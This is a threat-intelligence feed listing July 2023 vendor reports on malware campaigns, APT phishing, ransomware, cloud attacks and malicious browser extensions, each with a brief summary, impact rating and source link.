Source: https://www.cert.hr/otkrivena-je-kriticna-ranjivost-ultimate-member-wordress-dodatka-zakrpe-nema/?utm_source=rss&utm_medium=rss&utm_campaign=otkrivena-je-kriticna-ranjivost-ultimate-member-wordress-dodatka-zakrpe-nema

Intel Source:: Kaspersky, Palant

Intel Name:: Malicious_extensions_in_Chrome_Web_Store

Date of Scan:: 2023-07-19

Impact:: LOW

Summary:: The subpage of the Kaspersky official blog discusses the discovery of malicious extensions in the Chrome Web Store with a total of 87 million downloads. The most popular extension, "Autoskip for Youtube," had nine million downloads. Users are advised to check and uninstall any malicious extensions as they can access user data.

Source: https://www.kaspersky.com/blog/dangerous-chrome-extensions-87-million/48562/ https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/

Intel Source:: Uptycs

Intel Name:: Fake_PoC_for_Linux_Kernel_Vulnerability_on_GitHub

Date of Scan:: 2023-07-19

Impact:: LOW

Summary:: Cybersecurity researchers continue to be under the radar of malicious actors, a proof-of-concept (PoC) has been discovered on GitHub, concealing a backdoor with a "crafty" persistence method.

Source: https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware

Intel Source:: KrebsonSecurity

Intel Name:: DomainNetworks_Mail_Scam

Date of Scan:: 2023-07-19

Impact:: LOW

Summary:: Researchers from KrebsonSecurity have identified domainNetworks is a fraudulent company behind a snail mail scam targeting domain owners. Its true operators remain unidentified, despite connections to thedomainsvault.com and UBSagency. These scams trick organizations into paying for unnecessary services.

Source: https://krebsonsecurity.com/2023/07/whos-behind-the-domainnetworks-snail-mail-scam/?replytocom=587051

Intel Source:: Lab52

Intel Name:: New_Invitation_From_APT29_to_Use_CCleaner

Date of Scan:: 2023-07-19

Impact:: LOW

Summary:: Researchers from Lab52 have seen a phishing effort that appears to be the Norwegian embassy inviting people to a party. The format of this particular "invitation" is in .svg. When the file is opened, a script is run that mounts and downloads an ISO file that contains the subsequent infection stage. The .svg file serves as an HTML smuggler in this manner, infecting the target and causing them to skip the subsequent stage.

Source: https://lab52.io/blog/2344-2/

Intel Source:: CERT-UA

Intel Name:: The_activities_of_the_UAC_0010_group_as_of_July_2023

Date of Scan:: 2023-07-19

Impact:: LOW

Summary:: The continuous accumulation and analysis of data on cyber incidents allows us to conclude that one of the most persistent cyber threats is UAC-0010 (Armageddon), the activities of which are carried out by former "officers" of the State Security Service of Crimea, who in 2014 betrayed their military oath and began to serve the FSB of Russia. The main task of the group is cyberespionage against the security and defense forces of Ukraine. At the same time, we know at least one case of destructive activity at an information infrastructure facility.

Source: https://cert.gov.ua/article/5160737

Intel Source:: Trustwave

Intel Name:: Enterprise_Applications_Honeypot_revealed_some_findings

Date of Scan:: 2023-07-19

Impact:: LOW

Summary:: Trustwave researchers have established a honeypot sensors network across six countries: Russia, Ukraine, Poland, UK, China, and the United States. Also, they present the most intriguing findings from the research into exposing vulnerable enterprise applications, such as Fortra GoAnywhere MFT, Microsoft Exchange, Fortinet FortiNAC, Atlassian BitBucket, and F5 Big-IP.s

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-enterprise-applications-honeypot-unveiling-findings-from-six-worldwide-locations/

Intel Source:: Rapid7

Intel Name:: Old_Blackmoon_Trojan_NEW_Monetization_Approach

Date of Scan:: 2023-07-18

Impact:: LOW

Summary:: Rapid7 has discovered a new campaign using the Blackmoon trojan targeting businesses in the USA and Canada. This campaign focuses on implementing evasion and persistence techniques, such as disabling Windows Defender. The trojan uses various persistence techniques, process injection, and exploits for remote services. It disables security tools, hijacks resources, and communicates with a Command and Control server using web protocols. The webpage includes file names, MD5 hashes, email addresses, a reference to a C&C server, and a link to a related article on monitor persistence.

Source: https://www.rapid7.com/blog/post/2023/07/13/old-blackmoon-trojan-new-monetization-approach/

Intel Source:: Sucuri

Intel Name:: A_variant_of_a_common_malware_injection

Date of Scan:: 2023-07-18

Impact:: LOW

Summary:: A recent investigation found malware injecting obfuscated JavaScript into legitimate files, redirecting website traffic to a parked domain for ad monetization. The injected script creates an invisible iframe from the parked domain, generating ad revenue and potentially redirecting visitors to questionable sites.

Source: https://blog.sucuri.net/2023/07/malicious-injection-redirects-traffic-to-parked-domain.html

Intel Source:: FACCT

Intel Name:: RedCurl_Hackers_Return_to_Spy_on_Major_Russian_Banks

Date of Scan:: 2023-07-18

Impact:: MEDIUM

Summary:: According to FACCT, the Russian-speaking Red Curl organization has attacked businesses in the UK, Germany, Canada, Norway, Ukraine, and Australia at least 34 times. Twenty of the attacks—more than half—took place in Russia. Construction, financial, consultancy, retail, banking, insurance, and legal enterprises were among the victims of cyber espionage.

Source: https://www.facct.ru/blog/redcurl-2023/?utm_source=twitter&utm_campaign=redcurl-23&utm_medium=social

Intel Source:: Wordfence

Intel Name:: Massive_Targeted_Exploit_Campaign_Against_WooCommerce_Payments

Date of Scan:: 2023-07-18

Impact:: LOW

Summary:: Wordfence researchers have identified there is an ongoing exploit campaign targeting a vulnerability in the WooCommerce Payments plugin. Attackers can gain administrative privileges on vulnerable websites. Wordfence provides protection against this vulnerability

Source: https://www.wordfence.com/blog/2023/07/massive-targeted-exploit-campaign-against-woocommerce-payments-underway/?utm_medium=email&_hsmi=266639985&_hsenc=p2ANqtz-8AxrS0jQ-RkxVtD0SfniOq77V_8TP6U08rEjcEDj_b8n3bXW3pcEeNGxsBvY58nI-AEfYwqBRm9q3Xeub5y8sJZSw9rzqT5rAlvdnt2riEjE_XnEc&utm_content=266639985&utm_source=hs_email

Intel Source:: Symantec, Cyble

Intel Name:: Microsoft_ZeroDay_Vulnerability_Exploited_by_Attackers

Date of Scan:: 2023-07-18

Impact:: HIGH

Summary:: Attackers are making use of a zero-day vulnerability (CVE-2023-36884) that affects Microsoft Windows and Office products. The exploit has so far been applied in extremely targeted attacks against businesses in the European and North American government and defense industries. Link: https://blog.cyble.com/2023/07/12/microsoft-zero-day-vulnerability-cve-2023-36884-being-actively-exploited/

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-zeroday-exploit

Intel Source:: Sysdig

Intel Name:: SCARLETEEL_2

Date of Scan:: 2023-07-18

Impact:: LOW

Summary:: Sysdig observed the their most recent activities of new version of SCARLTEEL 2.0. The analysts saw a similar strategy to previously reported of compromise AWS accounts through exploiting vulnerable compute services, gain persistence, and attempt to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped. By knowing the details of SCARLETEEL previously, it was discovered they are not only after cryptomining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted. We also watched them target Kubernetes in order to significantly scale their attack.

Source: https://sysdig.com/blog/scarleteel-2-0/

Intel Source:: Sentinelone

Intel Name:: Credential_Stealer_Expands_to_Azure_GCP_from_AWS

Date of Scan:: 2023-07-17

Impact:: LOW

Summary:: This ad shows the development of an experienced cloud actor who is knowledgeable about a variety of technologies. The actor apparently underwent a great deal of trial and error, as evidenced by decisions like feeding the curl binary to systems that do not already have it. Additionally, the actor has enhanced the tool's data layout to promote more autonomous engagement, displaying a certain amount of maturity and proficiency.

Source: https://www.sentinelone.com/labs/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/

Intel Source:: PaloAlto

Intel Name:: Beware_of_Cloaked_Ursa_Phishing_Scam

Date of Scan:: 2023-07-17

Impact:: LOW

Summary:: Unit 42 researchers have observed instances of Cloaked Ursa using lures focusing on the diplomats themselves more than the countries they represent. Also, identified Cloaked Ursa targeting diplomatic missions within Ukraine by leveraging something that all recently placed diplomats need – a vehicle.

Source: https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/

Intel Source:: Fortinet

Intel Name:: Microsoft_Office_Vulnerabilities_and_Macros_Used_by_LokiBot_Campaign

Date of Scan:: 2023-07-17

Impact:: MEDIUM

Summary:: Several malicious Microsoft Office documents created to take advantage of known vulnerabilities have been found by FortiGate researchers. Remote code execution flaws include CVE-2021-40444 and CVE-2022-30190 specifically. By taking advantage of these flaws, the attackers were able to insert malicious macros into Microsoft documents that, when used, installed the LokiBot malware on the victim's computer

Source: https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros

Intel Source:: Talos

Intel Name:: Malicious_Campaigns_Targeting_Civilian_Military_and_Governmental_Organisations

Date of Scan:: 2023-07-17

Impact:: MEDIUM

Summary:: Researchers from Talos have identified a threat actor who has been running various campaigns in Poland and Ukraine against civilian users, military groups, and governmental institutions. They determined that these actions are most likely carried out with the intent to steal data and gain ongoing remote access.

Source: https://blog.talosintelligence.com/malicious-campaigns-target-entities-in-ukraine-poland/

Intel Source:: Aquasec

Intel Name:: Introducing_TeamTNT_New_Cloud_Campaign

Date of Scan:: 2023-07-16

Impact:: LOW

Summary:: AquaSec researchers have uncovered an emerging campaign that is targeting exposed Docker APIs and JupyterLab instances. Upon further investigation of the infrastructure, found evidence of a broader campaign orchestrated by TeamTNT.

Source: https://blog.aquasec.com/teamtnt-reemerged-with-new-aggressive-cloud-campaign

Intel Source:: AT&T

Intel Name:: Attackers_Leveraging_OneNote_to_Deliver_Malware

Date of Scan:: 2023-07-16

Impact:: LOW

Summary:: Malware distributed using phishing emails with a OneNote attachment has increased from December 22nd, 2022. The end user would open the OneNote attachment, as they do with most phishing emails, but OneNote does not support macros like Microsoft Word or Excel do. Threat actors have historically used this method to launch programs that install malware.

Source: https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-onenote-malspam-detection-response

Intel Source:: Lumen

Intel Name:: Exploring_AVrecon_Underground_Routers

Date of Scan:: 2023-07-16

Impact:: LOW

Summary:: Another multi-year scheme involving infected routers all around the world is discovered by Lumen Black Lotus Labs. Small-office/home-office (SOHO) routers are infected as part of a sophisticated operation that uses the Linux-based Remote Access Trojan (RAT) known as "AVrecon."

Source: https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/

Intel Source:: ThreatFabric

Intel Name:: A_New_Sophisticated_Toolkit_For_Vishing_Called_Letscall

Date of Scan:: 2023-07-15

Impact:: LOW

Summary:: Researchers from Threat Fabric have identified a new sophisticated Vishing toolset called Letscall which currently targeting individuals from South Korea.

Source: https://www.threatfabric.com/blogs/letscall-new-sophisticated-vishing-toolset

Intel Source:: Cyble

Intel Name:: Hackers_Modify_TeamViewer_Installer_to_Deliver_njRAT

Date of Scan:: 2023-07-15

Impact:: LOW

Summary:: Researchers from Cyble have discovered a noteworthy occurrence involving the false use of a TeamViewer program file. A popular software program called TeamViewer enables remote control, desktop sharing, online meetings, file transfers, and group collaboration across numerous devices.

Source: https://blog.cyble.com/2023/07/13/trojanized-application-preying-on-teamviewer-users/

Intel Source:: Malwarebytes

Intel Name:: Malicious_Extension

Date of Scan:: 2023-07-14

Impact:: LOW

Summary:: The specific information on this subpage includes a password-protected RAR archive with the passwords 888 or 999. An MSI file has been analyzed, and it is mentioned that Malwarebytes EDR and MDR can remove ransomware remnants and prevent reinfection. There is also a free trial available for Malwarebytes' cybersecurity services

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/07/criminals-target-businesses-with-malicious-extension-for-metas-ads-manager-and-accidentally-leak-stolen-accounts

Intel Source:: Mandiant

Intel Name:: Stealing_Secrets_With_Infected_USB_Drives

Date of Scan:: 2023-07-14

Impact:: LOW

Summary:: Mandiant researchers have observed a threefold increase in the number of attacks using infected USB drives to steal secrets. The campaign named 'Sogu,' attributed to a Chinese espionage threat group 'TEMP.HEX,' and another named 'Snowydrive,' attributed to UNC4698, which targets oil and gas firms in Asia.

Source: https://www.mandiant.com/resources/blog/infected-usb-steal-secrets

Intel Source:: ASEC

Intel Name:: Kimsuky_Threat_Group_Using_Chrome_Remote_Desktop

Date of Scan:: 2023-07-14

Impact:: LOW

Summary:: Remote Desktop by the Kimsuky threat group, supported by North Korea, for their attacks. The group utilizes their own AppleSeed malware, as well as other remote control tools like Meterpreter and VNC, to gain control over infected systems. The Kimsuky group mainly distributes malware through spear phishing emails containing HWP and MS Office document files or CHM files. They also use Infostealer to gather sensitive information.

Source: https://asec.ahnlab.com/en/55145/

Intel Source:: TrendMicro

Intel Name:: BPFDoor_Backdoor_Variants_Abusing_BPF_Filters

Date of Scan:: 2023-07-14

Impact:: LOW

Summary:: BPFDoor has since become more difficult to detect due to the improved usage of Berkeley Packet Filter (BPF), a technology that allows programs to attach network filters to an open socket that’s being used by the threat actors behind BPFDoor to bypass firewalls’ inbound traffic rules and similar network protection solutions in Linux and Solaris operating systems (OS).

Source: https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html

Intel Source:: CERT-UA

Intel Name:: SmokeLoader_Distribution_via_Email

Date of Scan:: 2023-07-14

Impact:: MEDIUM

Summary:: CERT-UA researchers have identified a mass mailing of electronic messages with the subject "Invoice" and an attachment in the form of the file "Act_Zvirky_ta_rah.fakt_vid_12_07_2023.zip" containing the VBS file "invoice_from_12_07_2023_to_payment .vbs ", the opening of which will ensure that the SmokeLoader malware is downloaded and launched.

Source: https://cert.gov.ua/article/5158006

Intel Source:: Talos

Intel Name:: RedDriver_targets_Chinese_speakers_and_internet_cafes

Date of Scan:: 2023-07-13

Impact:: LOW

Summary:: The specific information on this subpage describes an undocumented browser hijacker called RedDriver. It explains that RedDriver targets Chinese speakers and internet cafes, and uses the Windows Filtering Platform to intercept browser traffic. It bypasses driver signature enforcement policies and utilizes stolen certificates. The authors of RedDriver are skilled in driver development and have deep knowledge of the Windows operating system. The subpage also includes a list of domains associated with RedDriver and provides various software and support resources offered by Talos.

Source: https://blog.talosintelligence.com/undocumented-reddriver/

Intel Source:: Huntress

Intel Name:: Business_Email_Compromise_hunting_details

Date of Scan:: 2023-07-13

Impact:: LOW

Summary:: The subpage specifically discusses threat hunting for business email compromise (BEC) using user agents on Microsoft 365. The author shares their approach and examples of suspicious user agents.vThey emphasize the importance of baseline user behavior, detection technology, The subpage also includes information on terms of use, privacy policy, legalities, and cookie policy of Huntress, with an option to sign up for blog updates.and prevention measures like multi-factor authentication.

Source: https://www.huntress.com/blog/threat-hunting-for-business-email-compromise-through-user-agents

Intel Source:: Wiz

Intel Name:: The_cloud_workloads_targeted_by_Python_based_fileless_malware

Date of Scan:: 2023-07-13

Impact:: LOW

Summary:: This subpage discusses the PyLoose fileless malware that targets cloud workloads. It provides information on the attack flow, including initial access, Python script drop, fileless execution, and in-memory XMRig execution. It mentions the attacker's Monero wallet address and provides details about the PyLoose loader's associated files and hash values. The subpage also references other articles and promotes the Wiz platform for cloud security.

Source: https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads

Intel Source:: Microsoft

Intel Name:: StormP_0978_phishing_campaign_uncovered_by_Microsoft

Date of Scan:: 2023-07-12

Impact:: LOW

Summary:: Microsoft identifies Storm-0978 targeting defense and government entities in Europe and North America. Exploiting CVE-2023-36884, they employ phishing campaigns and distribute the RomCom backdoor. Storm-0978 conducts opportunistic ransomware and espionage-related operations

Source: https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/

Intel Source:: Blackberry

Intel Name:: The_suspicion_of_targeting_Ukraine_s_NATO_Membership_Talks_by_RomCom_Threat_Actor

Date of Scan:: 2023-07-12

Impact:: MEDIUM

Summary:: In the bebinning of this month, the BlackBerry Threat researchers found two malicious documents came from an IP address in Hungary, sent as bate to an organization supporting Ukraine abroad, and a document targeting upcoming NATO Summit guests. Blackberry analysis assume to conclude that the threat actor known as RomCom who is behind this operation. Based on our internal network data analysis, and the full set of cyber tools were collected, was believed the threat actor behind this campaign ran their first drills on June 22, and also a few days before the command-and-control (C2) mentioned in their report was registered and went live.

Source: https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit

Intel Source:: Uptycs

Intel Name:: Deceptive_PoC_poses_hidden_backdoor

Date of Scan:: 2023-07-12

Impact:: LOW

Summary:: Uptycs reserachers discovered Backdoor disguised as innocuous learning tool targets Linux systems. Ensure removal of unauthorized SSH keys, delete kworker file, remove kworker path from bashrc file, and check /tmp/.iCE-unix.pid for potential threats. Exercise caution when testing PoCs and utilize isolated environments for protection.

Source: https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware

Intel Source:: Zscalar

Intel Name:: Analysis_of_New_MultiStage_Attack_Targeting_LATAM_Region

Date of Scan:: 2023-07-11

Impact:: LOW

Summary:: Zscaler researchers have uncovered a concerning development, a new targeted attack campaign striking businesses in the Latin American (LATAM) region. This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage.

Source: https://www.zscaler.com/blogs/security-research/toitoin-trojan-analyzing-new-multi-stage-attack-targeting-latam-region

Intel Source:: ASEC

Intel Name:: Rekoobe_Backdoor_targeting_Linux_systems_in_Korea

Date of Scan:: 2023-07-11

Impact:: MEDIUM

Summary:: AhnLab Security Emergency Response Center (ASEC) has been receiving reports of the Rekoobe malware from tenants in Korea for several years, and will hereby share its brief analysis. Additionally, the Rekoobe variants will be categorized along with a summary of the ones used to target Korean companies.

Source: https://asec.ahnlab.com/en/55229/

Intel Source:: TrendMicro

Intel Name:: Rootkit_acts_as_a_universal_loader

Date of Scan:: 2023-07-11

Impact:: LOW

Summary:: TrendMicro researchers observed New signed rootkit discovered originating from China targets the gaming sector. The rootkit acts as a universal loader and communicates with a command-and-control infrastructure. It has passed through the Windows Hardware Quality Labs process and obtained a valid signature. Reported to Microsoft's Security Response Center.

Source: https://www.trendmicro.com/en_us/research/23/g/hunting-for-a-new-stealthy-universal-rootkit-loader.html

Intel Source:: ASEC

Intel Name:: Distribution_of_malicious_batch_file

Date of Scan:: 2023-07-11

Impact:: LOW

Summary:: AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware in the form of a batch file (*.bat). This malware is designed to download various scripts based on the anti-malware process, including AhnLab products, installed in the user’s environment. Based on the function names used by the malware and the downloaded URL parameters, it is suspected to have been distributed by the Kimsuky group

Source: https://asec.ahnlab.com/en/55219/

Intel Source:: Microsoft

Intel Name:: A_BlackByte_ransomware_deep_analyses

Date of Scan:: 2023-07-10

Impact:: LOW

Summary:: Microsoft Incident Response team observed threat actor went through the full attack chain, from initial access to impact in less than five days, causing a huge impact on the business disruption for the victim organization. Their findings dicovered that within those five days, the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware, to achieve their objectives.

Source: https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/

Intel Source:: TrendMicro

Intel Name:: Deep_details_of_Big_Head_Ransomware_s_Variants

Date of Scan:: 2023-07-10

Impact:: LOW

Summary:: Deeper analyses and updates IOCs

Source: https://www.trendmicro.com/en_us/research/23/g/tailing-big-head-ransomware-variants-tactics-and-impact.html

Intel Source:: CERT-UA

Intel Name:: Phishing_Attacks_by_APT28_Group

Date of Scan:: 2023-07-10

Impact:: LOW

Summary:: CERT-UA researchers have discovered HTML files that imitate the web interface of mail services and implement the technical possibility of exfiltrating authentication data entered by the victim using HTTP POST requests. At the same time, the transfer of stolen data is carried out using previously compromised Ubiquiti devices (EdgeOS)

Source: https://cert.gov.ua/article/5105791

Intel Source:: Malwarebytes

Intel Name:: The_malvertising_USPS_campaign

Date of Scan:: 2023-07-10

Impact:: LOW

Summary:: Malwarebytes researechers observed a recent phishing attack that was targeting both mobile and Desktop users looking up to track their packages via the United States Postal Service website.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/07/malicious-ad-for-usps-phishes-for-jpmorgan-chase-credentials

Intel Source:: ASEC, Ciberdefensa

Intel Name:: The_distribution_of_NetSupport_RAT

Date of Scan:: 2023-07-10

Impact:: LOW

Summary:: ASEC lab reserachers discovered NetSupport RAT being distributed via a spear phishing email that has recently been in circulation. Their analyses showed the whole provess flow from its distribution via phishing emails and its detection.

Source: https://ciberdefensa.cat/archivos/16021 https://asec.ahnlab.com/en/55146/

Intel Source:: Lab52

Intel Name:: Unknown_Actor_Targeting_Chinese_Users_With_APT29_TTP

Date of Scan:: 2023-07-10

Impact:: LOW

Summary:: Lab52 researchers have identified a different maldoc samples of a potential malicious campaign. The maldoc seems to be a campaign against Chinese speaking users as the content of the maldoc is written in Chinese. The infection chain is similar to the threat actor APT29, however it has been identified significant differences related to the typical APT29’s infection chain that makes consider that it does not seem to be this threat actor.

Source: https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/

Intel Source:: CERT-UA

Intel Name:: Ukrainian_Public_Entities_Are_Targeted_by_UAC_0057

Date of Scan:: 2023-07-10

Impact:: MEDIUM

Summary:: CERT-UA researchers have identified a new targeted cyber attack by the UAC-0057 group against Ukrainian public officials leveraging XLS files that contain a malicious macro spreading PicassoLoader malware. The malicious loader is capable of dropping another malicious strain dubbed njRAT to spread the infection further.

Source: https://cert.gov.ua/article/5098518

Intel Source:: CISA

Intel Name:: Increasing_TrueBot_Malware_Attacks

Date of Scan:: 2023-07-09

Impact:: MEDIUM

Summary:: CISA researchers have warned about the emergence of new variants of the TrueBot malware. These variants specifically target organizations in the United States and Canada, aiming to extract sensitive data from compromised networks.

Source: https://www.cisa.gov/sites/default/files/2023-07/aa23-187a-increased-truebot-activity-infects-us-and-canada-based-networks_1.pdf

Intel Source:: Proofpoint

Intel Name:: Analysis_of_TA453s_Foray_into_LNKs_and_Mac_Malware

Date of Scan:: 2023-07-08

Impact:: LOW

Summary:: Proofpoint researchers have observed that TA453 continues to adapt its malware arsenal, deploying novel file types and targeting new operating systems, specifically sending Mac malware to one of its recent targets.

Source: https://www.proofpoint.com/us/blog/threat-insight/welcome-new-york-exploring-ta453s-foray-lnks-and-mac-malware

Intel Source:: Cyble

Intel Name:: Ransomware_Lists_Victim_Host_Information_in_Ransom_Note

Date of Scan:: 2023-07-08

Impact:: LOW

Summary:: Cyble researchers have identified a new ransomware strain named “Underground team ransomware,” The ransom note of the Underground Team ransomware introduces novel elements that distinguish it from typical ransom notes. In addition to guaranteeing a fair and confidential deal within a short timeframe, the group offers more than just a decryptor.

Source: https://blog.cyble.com/2023/07/05/underground-team-ransomware-demands-nearly-3-million/

Intel Source:: Cyble

Intel Name:: ARCrypter_ransomware_activity

Date of Scan:: 2023-07-08

Impact:: LOW

Summary:: ARCrypter ransomware, also known as ChileLocker, got attention since last August 2022 with their attack in Chile. Soon, researchers discovered that this ransomware started targeting organizations worldwide. It has been observed that ARCrypter ransomware targets both Windows and Linux operating systems.This year, researchers reported the existanse of a new Linux variant of ARCrypter, developed using the GO programming language and also an updated version of the ARCrypt Windows executable. The TA discovered the new techniques of TA to interact with their victims. In comparasing with the older variant of ARCrypt ransomware, the researcgers identified the following: The ransom note of each binary was pointing to a mirror site and the TA created dedicated chat sites hosted on Tor for each victim.

Source: https://blog.cyble.com/2023/07/06/arcrypt-ransomware-evolves-with-multiple-tor-communication-channels/

Intel Source:: ReversingLabs

Intel Name:: Malicious_NPM_Packages_Fuel_Supply_Chain_and_Phishing_Attacks

Date of Scan:: 2023-07-07

Impact:: LOW

Summary:: ReversingLabs researchers have discovered more than a dozen malicious packages published to the npm open-source repository that appear to target application end users while also supporting email phishing campaigns targeting Microsoft 365 users.

Source: https://www.reversinglabs.com/blog/operation-brainleeches-malicious-npm-packages-fuel-supply-chain-and-phishing-attacks

Intel Source:: Checkpoint

Intel Name:: Hackers_From_China_Targeting_Europe_in_SmugX_Campaign

Date of Scan:: 2023-07-07

Impact:: MEDIUM

Summary:: Checkpoint researchers have identified a campaign where a Chinese threat actor targeting government entities in Europe, with a focus on foreign and domestic policy entities.

Source: https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/

Intel Source:: Reliaquest

Intel Name:: The_Details_of_Infection_of_Gootloader_Led_to_Credential_Access

Date of Scan:: 2023-07-07

Impact:: LOW

Summary:: The ReliaQuest researchers have responded to an incident involving credential access and exfiltration that was traced back to the JavaScript-based initial access malware “Gootloader.”

Source: https://www.reliaquest.com/blog/gootloader-infection-credential-access/

Intel Source:: Aquasec

Intel Name:: Analysis_of_Silentbobs_Cloud_Attack

Date of Scan:: 2023-07-07

Impact:: MEDIUM

Summary:: Aqua Nautilus researchers have identified an infrastructure of a potentially massive campaign against cloud-native environments. It is in early stages of testing and deployment, and is mainly consistent of an aggressive cloud worm, designed to deploy on exposed JupyterLab and Docker APIs in order to deploy Tsunami malware, cloud credentials hijack, resource hijack and further infestation of the worm.

Source: https://blog.aquasec.com/threat-alert-anatomy-of-silentbobs-cloud-attack

Intel Source:: Welivesecurity

Intel Name:: Diving_Deep_into_Emotet_Malware_Family

Date of Scan:: 2023-07-07

Impact:: LOW

Summary:: Emotet is a malware family active since 2014, operated by a cybercrime group known as Mealybug or TA542. It is launched multiple spam campaigns since it re-appeared after its takedown. Also, Mealybug created multiple new modules and multiple times updated and improved all existing modules.

Source: https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/

Intel Source:: Quickheal

Intel Name:: White_Snake_stealer_threat

Date of Scan:: 2023-07-06

Impact:: LOW

Summary:: Quick heal researchers provided the technical aspects of the updated White snake stealer version 1.6, to provide insights into its behaviour and shed light on its latest capabilities.

Source: https://blogs.quickheal.com/white-snake-menace-the-growing-threat-of-information-stealers-in-the-cybercrime-landscape/

Intel Source:: CERT-UA

Intel Name:: Attackers_Targeting_North_Atlantic_Treaty_Organization

Date of Scan:: 2023-07-06

Impact:: MEDIUM

Summary:: CERT-UA researchers have discovered the website, which copies the English version of the web resource of the international non-governmental organization "World Congress of Ukrainians" legitimate page.

Source: https://cert.gov.ua/article/5077168

Intel Source:: Sentinelone

Intel Name:: Neo_Nets_eCrime_campaign_targeted_financial_institutions

Date of Scan:: 2023-07-06

Impact:: LOW

Summary:: SentinelLabs has been tracking Neo_Net conducted an eCrime campaign targeting clients of financial institutions, primarily in Spain and Chile. Using SMS phishing messages and fake banking pages, Neo_Net stole over 350,000 EUR and compromised personal information of thousands of victims. The campaign involved renting out infrastructure, selling victim data, and offering a Smishing-as-a-Service platform.

Source: https://www.sentinelone.com/blog/neo_net-the-kingpin-of-spanish-ecrime/

Intel Source:: Elastic

Intel Name:: New_Variant_of_North_Korea_linked_RUSTBUCKET_macOS_Malware

Date of Scan:: 2023-07-06

Impact:: LOW

Summary:: Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. It allows operators to download and execute various payloads.

Source: https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket

Intel Source:: Sekoia

Intel Name:: NoName_057_16_DDoSia_Project_Gets_an_Upgrade

Date of Scan:: 2023-07-06

Impact:: LOW

Summary:: Researchers from Sekoia have analyzed an updated variant of the DDoSia attack tool that was developed and used by the pro-Russia collective NoName(057)16.

Source: https://blog.sekoia.io/following-noname05716-ddosia-projects-targets/

Intel Source:: Cyble

Intel Name:: Multiple_New_Clipper_Malware_Variants

Date of Scan:: 2023-07-06

Impact:: LOW

Summary:: Cyble researchers discovered several Clipper malware variants, including Laplas Clipper, IBAN Clipper, Keona Clipper, and many others in the past. Recently, they observed several variants of Clipper malware and saw a significant number of samples related to these variants being submitted to VirusTotal. The Clipper malware operates by cunningly hijacking cryptocurrency transactions, stealthily replacing the victim’s wallet address with that of the Threat Actors’ (TAs) wallet address. Suppose an unsuspecting user tries to pay from their cryptocurrency account, and the transaction has been diverted to an entirely different recipient (the account of the TAs instead of the intended recipient). This alarming turn of events can lead to significant financial losses and potential devastation for the victim.

Source: https://blog.cyble.com/2023/06/30/multiple-new-clipper-malware-variants-discovered-in-the-wild/

Intel Source:: Inky

Intel Name:: Malicious_QR_Codes_are_getting_to_employee_credentials

Date of Scan:: 2023-07-05

Impact:: LOW

Summary:: INKY recently discovered multitude of QR Code phish and shared their findings.

Source: https://www.inky.com/en/blog/fresh-phish-malicious-qr-codes-are-quickly-retrieving-employee-credentials

Intel Source:: Avast

Intel Name:: Decryption_tool_for_the_Akira_ransomware

Date of Scan:: 2023-07-05

Impact:: LOW

Summary:: Researchers for Avast have developed a decryptor for the Akira ransomware and released it for public download. The Akira ransomware appeared in March 2023 and since then, the gang claims successful attacks on various organizations in the education, finance and real estate industries, amongst others.

Source: https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/

Intel Source:: Uptycs

Intel Name:: Meduza_Stealer

Date of Scan:: 2023-07-05

Impact:: LOW

Summary:: Recently, while monitoring the Uptycs Threat Research team dscovered a menace named The Meduza Stealer. Created by an enigmatic actor known as 'Meduza', this malware has been specifically designed to target Windows users and organizations, currently targeting only ten specific countries. The Meduza Stealer has a purpose to perform data theft. It pilfers users' browsing activities, extracting a wide array of browser-related data. From critical login credentials to the valuable record of browsing history and meticulously curated bookmarks, no digital artifact is safe. Even crypto wallet extensions, password managers, and 2FA extensions are vulnerable.

Source: https://www.uptycs.com/blog/what-is-meduza-stealer-and-how-does-it-work

Intel Source:: Sophos

Intel Name:: Th_connection_investigation_of_2_clients_in_2_threat_hunts

Date of Scan:: 2023-07-05

Impact:: LOW

Summary:: Two clients, two threat hunts have been researched for any connection between them. Using Microsoft’s cloud-security API to parse piles of disparate data leads to captivation results.

Source: https://news.sophos.com/en-us/2023/06/30/investigator-api-yourself-deploying-microsoft-graph-on-the-trail-of-an-attacker/

Intel Source:: ASEC

Intel Name:: Crysis_Threat_Actor_Using_RDP_to_Install_Venus_Ransomware

Date of Scan:: 2023-07-05

Impact:: LOW

Summary:: ASEC researchers have disclosed that the Crysis ransomware’s threat actor is also using the Venus ransomware in the attacks. Crysis and Venus are both major ransomware types known to target externally exposed remote desktop services.

Source: https://asec.ahnlab.com/en/54937/

Intel Source:: Wordfence

